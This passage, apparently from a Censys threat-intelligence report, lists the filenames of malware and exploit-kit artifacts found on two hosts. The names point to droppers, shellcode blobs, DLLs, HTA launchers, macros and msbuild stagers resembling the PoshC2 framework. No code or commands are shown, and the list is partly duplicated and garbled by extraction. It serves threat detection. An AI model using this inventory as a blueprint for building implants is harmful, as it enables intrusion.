[Posh_v4_x64.dll](Posh_v4_x64.dll) - [Posh_v4_x64_Shellcode.b64](Posh_v4_x64_Shellcode.b64) - [Posh_v4_x64_Shellcode.bin](Posh_v4_x64_Shellcode.bin) - [Posh_v4_x86.dll](Posh_v4_x86.dll) - [Posh_v4_x86_Shellcode.b64](Posh_v4_x86_Shellcode.b64) - [Posh_v4_x86_Shellcode.bin](Posh_v4_x86_Shellcode.bin) - [py_dropper.py](py_dropper.py) - [py_dropper.sh](py_dropper.sh) - [rg_sct.xml](rg_sct.xml) - [Sharp_Posh_PBind_Stager.cs](Sharp_Posh_PBind_Stager.cs) - [Sharp_Posh_Stager.cs](Sharp_Posh_Stager.cs) - [Sharp_v4_csc.cs](Sharp_v4_csc.cs) - [Sharp_v4_Donut_x64_Shellcode.b64](Sharp_v4_Donut_x64_Shellcode.b64) - [Sharp_v4_Donut_x64_Shellcode.bin](Sharp_v4_Donut_x64_Shellcode.bin) - [Sharp_v4_Donut_x86_Shellcode.b64](Sharp_v4_Donut_x86_Shellcode.b64) - [Sharp_v4_Donut_x86_Shellcode.bin](Sharp_v4_Donut_x86_Shellcode.bin) - [Sharp_v4_DotNet2JS.b64](Sharp_v4_DotNet2JS.b64) - [Sharp_v4_DotNet2JS.js](Sharp_v4_DotNet2JS.js) - [Sharp_v4_dropper_migrate_x64.c](Sharp_v4_dropper_migrate_x64.c) - [Sharp v4 dropper migrate x64 exe](Sharp v4 dropper migrate x64 exe) ###### Contents: ( - [ - [ - [ - [ - [ - [ - [ - [ - [Posh_v2_msbuild.xml - [Posh_v2_x64.dll](Posh_v2_x64.dll) - [Posh_v2_x64_Shellcode.b64](Posh_v2_x64_Shellcode.b64) - [Posh_v2_x64_Shellcode.bin](Posh_v2_x64_Shellcode.bin) - [Posh_v2_x86.dll](Posh_v2_x86.dll) - [Posh_v2_x86_Shellcode.b64](Posh_v2_x86_Shellcode.b64) - [Posh_v2_x86_Shellcode.bin](Posh_v2_x86_Shellcode.bin) - [Posh_v4_csc.cs](Posh_v4_csc.cs) - [Posh_v4_Donut_x64_Shellcode.b64 - [Posh_v4_Donut_x64_Shellcode.bin - [Posh_v4_Donut_x86_Shellcode.b64 - [Posh_v4_Donut_x86_Shellcode.bin ----- #### Malware/Exploit Kit on Host E con’t ###### Contents: - [Sharp_v4_dropper_x64.c](Sharp_v4_dropper_x64.c) - [Sharp_v4_dropper_x64.exe](Sharp_v4_dropper_x64.exe) - [Sharp_v4_dropper_x86.c](Sharp_v4_dropper_x86.c) - [Sharp_v4_dropper_x86.exe](Sharp_v4_dropper_x86.exe) - [Sharp_v4_msbuild.xml](Sharp_v4_msbuild.xml) - [Sharp_v4_x64.dll](Sharp_v4_x64.dll) - [Sharp_v4_x64_Shellcode.b64](Sharp_v4_x64_Shellcode.b64) - [Sharp_v4_x64_Shellcode.bin](Sharp_v4_x64_Shellcode.bin) - [Sharp_v4_x86.dll](Sharp_v4_x86.dll) - [Sharp_v4_x86_Shellcode.b64](Sharp_v4_x86_Shellcode.b64) - [Sharp_v4_x86_Shellcode.bin](Sharp_v4_x86_Shellcode.bin) ----- #### Host H - [64RA.exe](64RA.exe) - [aes.py](aes.py) - [cs_sct.xml](cs_sct.xml) - [dropper.cs](dropper.cs) - [dropper_cs.exe](dropper_cs.exe) - [dropper_cs_ps_pbind_v4.exe](dropper_cs_ps_pbind_v4.exe) - [dropper_cs_ps_v2.exe](dropper_cs_ps_v2.exe) - [dropper_cs_ps_v4.exe](dropper_cs_ps_v4.exe) - [dropper_jxa.js](dropper_jxa.js) - [DynamicCode.cs](DynamicCode.cs) - [fcomm.cs](fcomm.cs) - [fcomm_cs.exe](fcomm_cs.exe) - [FCommSharp_v4_csc.cs](FCommSharp_v4_csc.cs) - [FCommSharp_v4_Donut_x64_Shellcode.b64](FCommSharp_v4_Donut_x64_Shellcode.b64) - [FCommSharp_v4_Donut_x64_Shellcode.bin](FCommSharp_v4_Donut_x64_Shellcode.bin) - [FCommSharp_v4_Donut_x86_Shellcode.b64](FCommSharp_v4_Donut_x86_Shellcode.b64) - [FCommSharp_v4_Donut_x86_Shellcode.bin](FCommSharp_v4_Donut_x86_Shellcode.bin) - [FCommSharp_v4_DotNet2JS.b64](FCommSharp_v4_DotNet2JS.b64) - [FCommSharp_v4_DotNet2JS.js](FCommSharp_v4_DotNet2JS.js) - [FCommSharp_v4_dropper_migrate_x64.c](FCommSharp_v4_dropper_migrate_x64.c) - [FCommSharp_v4_dropper_migrate_x64.exe](FCommSharp_v4_dropper_migrate_x64.exe) - [FCommSharp_v4_dropper_migrate_x86.c](FCommSharp_v4_dropper_migrate_x86.c) - [FCommSharp_v4_dropper_migrate_x86.exe](FCommSharp_v4_dropper_migrate_x86.exe) - [FCommSharp_v4_dropper_x64.c](FCommSharp_v4_dropper_x64.c) - [FCommSharp_v4_dropper_x64.exe](FCommSharp_v4_dropper_x64.exe) - [FCommSharp_v4_dropper_x86.c](FCommSharp_v4_dropper_x86.c) - [FCommSharp_v4_dropper_x86.exe](FCommSharp_v4_dropper_x86.exe) - [FCommSharp_v4_msbuild.xml](FCommSharp_v4_msbuild.xml) - [FCommSharp_v4_x64.dll](FCommSharp_v4_x64.dll) - [FCommSharp_v4_x64_Shellcode.b64](FCommSharp_v4_x64_Shellcode.b64) - [FCommSharp_v4_x64_Shellcode.bin](FCommSharp_v4_x64_Shellcode.bin) - [FCommSharp_v4_x86.dll](FCommSharp_v4_x86.dll) - [FCommSharp_v4_x86_Shellcode.b64](FCommSharp_v4_x86_Shellcode.b64) - [FCommSharp_v4_x86_Shellcode.bin](FCommSharp_v4_x86_Shellcode.bin) - [Launcher.hta](Launcher.hta) - [macro.txt](macro.txt) - [payload.bat](payload.bat) - [payload.txt](payload.txt) - [pbind.cs](pbind.cs) - [pbind_cs.exe](pbind_cs.exe) - [PBind_v4_csc.cs](PBind_v4_csc.cs) - [PBind_v4_Donut_x64_Shellcode.b64](PBind_v4_Donut_x64_Shellcode.b64) - [PBind v4 Donut x64 Shellcode.bin](PBind v4 Donut x64 Shellcode.bin) ----- #### Host H con’t - [PBind_v4_dropper_x64.exe](PBind_v4_dropper_x64.exe) - [PBind_v4_dropper_x86.c](PBind_v4_dropper_x86.c) - [PBind_v4_dropper_x86.exe](PBind_v4_dropper_x86.exe) - [PBind_v4_msbuild.xml](PBind_v4_msbuild.xml) - [PBind_v4_x64.dll](PBind_v4_x64.dll) - [PBind_v4_x64_Shellcode.b64](PBind_v4_x64_Shellcode.b64) - [PBind_v4_x64_Shellcode.bin](PBind_v4_x64_Shellcode.bin) - [PBind_v4_x86.dll](PBind_v4_x86.dll) - [PBind_v4_x86_Shellcode.b64](PBind_v4_x86_Shellcode.b64) - [PBind_v4_x86_Shellcode.bin](PBind_v4_x86_Shellcode.bin) - [PBindSharp_v4_csc.cs](PBindSharp_v4_csc.cs) - [PBindSharp_v4_Donut_x64_Shellcode.b64](PBindSharp_v4_Donut_x64_Shellcode.b64) - [PBindSharp_v4_Donut_x64_Shellcode.bin](PBindSharp_v4_Donut_x64_Shellcode.bin) - [PBindSharp_v4_Donut_x86_Shellcode.b64](PBindSharp_v4_Donut_x86_Shellcode.b64) - [PBindSharp_v4_Donut_x86_Shellcode.bin](PBindSharp_v4_Donut_x86_Shellcode.bin) - [PBindSharp_v4_DotNet2JS.b64](PBindSharp_v4_DotNet2JS.b64) - [PBindSharp_v4_DotNet2JS.js](PBindSharp_v4_DotNet2JS.js) - [PBindSharp_v4_dropper_migrate_x64.c](PBindSharp_v4_dropper_migrate_x64.c) - [PBindSharp_v4_dropper_migrate_x64.exe](PBindSharp_v4_dropper_migrate_x64.exe) - [PBindSharp_v4_dropper_migrate_x86.c](PBindSharp_v4_dropper_migrate_x86.c) - [PBindSharp_v4_dropper_migrate_x86.exe](PBindSharp_v4_dropper_migrate_x86.exe) - [PBindSharp_v4_dropper_x64.c](PBindSharp_v4_dropper_x64.c) - [PBindSharp_v4_dropper_x64.exe](PBindSharp_v4_dropper_x64.exe) - [PBindSharp_v4_dropper_x86.c](PBindSharp_v4_dropper_x86.c) - [PBindSharp_v4_dropper_x86.exe](PBindSharp_v4_dropper_x86.exe) - [PBindSharp_v4_msbuild.xml](PBindSharp_v4_msbuild.xml) - [PBindSharp_v4_x64.dll](PBindSharp_v4_x64.dll) - [PBindSharp_v4_x64_Shellcode.b64](PBindSharp_v4_x64_Shellcode.b64) - [PBindSharp_v4_x64_Shellcode.bin](PBindSharp_v4_x64_Shellcode.bin) - [PBindSharp_v4_x86.dll](PBindSharp_v4_x86.dll) - [PBindSharp_v4_x86_Shellcode.b64](PBindSharp_v4_x86_Shellcode.b64) - [PBindSharp_v4_x86_Shellcode.bin](PBindSharp_v4_x86_Shellcode.bin) - [Posh_v2_csc.cs](Posh_v2_csc.cs) - [Posh_v2_Donut_x64_Shellcode.b64](Posh_v2_Donut_x64_Shellcode.b64) - [Posh_v2_Donut_x64_Shellcode.bin](Posh_v2_Donut_x64_Shellcode.bin) - [Posh_v2_Donut_x86_Shellcode.b64](Posh_v2_Donut_x86_Shellcode.b64) - [Posh_v2_Donut_x86_Shellcode.bin](Posh_v2_Donut_x86_Shellcode.bin) - [Posh_v2_DotNet2JS.b64](Posh_v2_DotNet2JS.b64) - [Posh_v2_DotNet2JS.js](Posh_v2_DotNet2JS.js) - [Posh_v2_dropper_migrate_x64.c](Posh_v2_dropper_migrate_x64.c) - [Posh_v2_dropper_migrate_x64.exe](Posh_v2_dropper_migrate_x64.exe) - [Posh_v2_dropper_migrate_x86.c](Posh_v2_dropper_migrate_x86.c) - [Posh v2 dropper migrate x86.exe](Posh v2 dropper migrate x86.exe) ----- #### Host H con’t - [Posh_v2_x86_Shellcode.b64](Posh_v2_x86_Shellcode.b64) - [Posh_v2_x86_Shellcode.bin](Posh_v2_x86_Shellcode.bin) - [Posh_v4_csc.cs](Posh_v4_csc.cs) - [Posh_v4_Donut_x64_Shellcode.b64](Posh_v4_Donut_x64_Shellcode.b64) - [Posh_v4_Donut_x64_Shellcode.bin](Posh_v4_Donut_x64_Shellcode.bin) - [Posh_v4_Donut_x86_Shellcode.b64](Posh_v4_Donut_x86_Shellcode.b64) - [Posh_v4_Donut_x86_Shellcode.bin](Posh_v4_Donut_x86_Shellcode.bin) - [Posh_v4_DotNet2JS.b64](Posh_v4_DotNet2JS.b64) - [Posh_v4_DotNet2JS.js](Posh_v4_DotNet2JS.js) - [Posh_v4_dropper_migrate_x64.c](Posh_v4_dropper_migrate_x64.c) - [Posh_v4_dropper_migrate_x64.exe](Posh_v4_dropper_migrate_x64.exe) - [Posh_v4_dropper_migrate_x86.c](Posh_v4_dropper_migrate_x86.c) - [Posh_v4_dropper_migrate_x86.exe](Posh_v4_dropper_migrate_x86.exe) - [Posh_v4_dropper_x64.c](Posh_v4_dropper_x64.c) - [Posh_v4_dropper_x64.exe](Posh_v4_dropper_x64.exe) - [Posh_v4_dropper_x86.c](Posh_v4_dropper_x86.c) - [Posh_v4_dropper_x86.exe](Posh_v4_dropper_x86.exe) - [Posh_v4_msbuild.xml](Posh_v4_msbuild.xml) - [Posh_v4_x64.dll](Posh_v4_x64.dll) - [Posh_v4_x64_Shellcode.b64](Posh_v4_x64_Shellcode.b64) - [Posh_v4_x64_Shellcode.bin](Posh_v4_x64_Shellcode.bin) - [Posh_v4_x86.dll](Posh_v4_x86.dll) - [Posh_v4_x86_Shellcode.b64](Posh_v4_x86_Shellcode.b64) - [Posh_v4_x86_Shellcode.bin](Posh_v4_x86_Shellcode.bin) - [py_dropper.py](py_dropper.py) - [py_dropper.sh](py_dropper.sh) - [rg_sct.xml](rg_sct.xml) - [Sharp_Posh_PBind_Stager.cs](Sharp_Posh_PBind_Stager.cs) - [Sharp_Posh_Stager.cs](Sharp_Posh_Stager.cs) - [Sharp_v4_csc.cs](Sharp_v4_csc.cs) - [Sharp_v4_Donut_x64_Shellcode.b64](Sharp_v4_Donut_x64_Shellcode.b64) - [Sharp_v4_Donut_x64_Shellcode.bin](Sharp_v4_Donut_x64_Shellcode.bin) - [Sharp_v4_Donut_x86_Shellcode.b64](Sharp_v4_Donut_x86_Shellcode.b64) - [Sharp_v4_Donut_x86_Shellcode.bin](Sharp_v4_Donut_x86_Shellcode.bin) - [Sharp_v4_DotNet2JS.b64](Sharp_v4_DotNet2JS.b64) - [Sharp_v4_DotNet2JS.js](Sharp_v4_DotNet2JS.js) - [Sharp_v4_dropper_migrate_x64.c](Sharp_v4_dropper_migrate_x64.c) - [Sharp_v4_dropper_migrate_x64.exe](Sharp_v4_dropper_migrate_x64.exe) - [Sharp_v4_dropper_migrate_x86.c](Sharp_v4_dropper_migrate_x86.c) - [Sharp_v4_dropper_migrate_x86.exe](Sharp_v4_dropper_migrate_x86.exe) - [Sharp_v4_dropper_x64.c](Sharp_v4_dropper_x64.c) - [Sharp_v4_dropper_x64.exe](Sharp_v4_dropper_x64.exe) - [Sharp v4 dropper x86.c](Sharp v4 dropper x86.c) ----- #### Host H con’t ----- ###### CONTACT: federal@censys.io -----